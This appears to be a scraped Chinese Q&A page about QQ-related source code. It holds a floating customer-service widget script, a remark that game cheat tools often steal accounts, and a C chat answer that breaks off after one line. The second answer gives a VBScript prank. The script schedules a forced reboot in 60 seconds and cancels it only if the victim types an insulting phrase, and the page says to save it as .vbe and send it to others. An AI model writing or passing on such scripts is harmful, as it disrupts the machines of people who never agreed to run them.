qq辅助源码
⑴ 浮动QQ客服源代码
很简单的用DIV+javascript很快就实现了。
<script>
var online= new Array();
</script>
<script src="http://webpresence.qq.com/getonline?Type=1&274781833:"></script>
<script language=javascript>var specialcode="<DIV id=searchspe style='Z-INDEX: 100; right: 3px; POSITION: absolute; TOP: 320px; width:130px'><table width='130' border='0' align='center' cellpadding='0' cellspacing='0' bgcolor='#FFFFFF' style='border:solid 1px #1249A3;'><tr><td height='24' align='center' style='font-size:12px;background-color:#1249A3; color:#FFFFFF'>在线服务</td></tr><tr><td bgcolor='#dddddd' height='2'></td></tr><tr><td height='24'><table width='98%' border='0' align='center' cellpadding='0' cellspacing='0'><tr><td height='30' align='center' bordercolor='0' style='font-size:12px'>";
if (online[0]==0)
specialcode=specialcode+"<a href='tencent://message/?uin=274781833&Site=请留言&Menu=yes'><img src='images/offline.jpg' width='73' height='22' border='0'></a> 请留言";
else
specialcode=specialcode+"<a href='tencent://message/?uin=274781833&Site=在线即时交谈&Menu=yes'><img src='images/online.gif' width='73' height='22' border='0'></a> 在线交谈";
specialcode=specialcode+"</td></tr></table></td></tr></table></DIV>";document.write(specialcode);lastScrollY=0;function heartBeat0(){diffY=document.body.scrollTop;percent=.1*(diffY-lastScrollY);if(percent>0)percent=Math.ceil(percent);else percent=Math.floor(percent);document.all.searchspe.style.pixelTop+=percent;lastScrollY=lastScrollY+percent;}window.setInterval("heartBeat0()",1);</script>
⑵ 求个QQ整人软件的源代码
新建一个文本文档输入以下内容
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说就一分钟关你机,不信,试试···"" ",0 ,true
dim a
do while(a <> "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"
最后保存为.vbe格式
发给别人试试吧 自己就不要试了吧
⑶ 跪求QQ飞车辅助源码,好多辅助都是改的界面,其实是1个G,是哪个G啊求那个G的源码!20分
G都是这样的,换汤不换药!换药也只是加味盗号用的而已!
⑷ 如何用c语言编写QQ聊天程序(源代码)
1、首先,我们编写C语言的头文件#include <stdio.h>。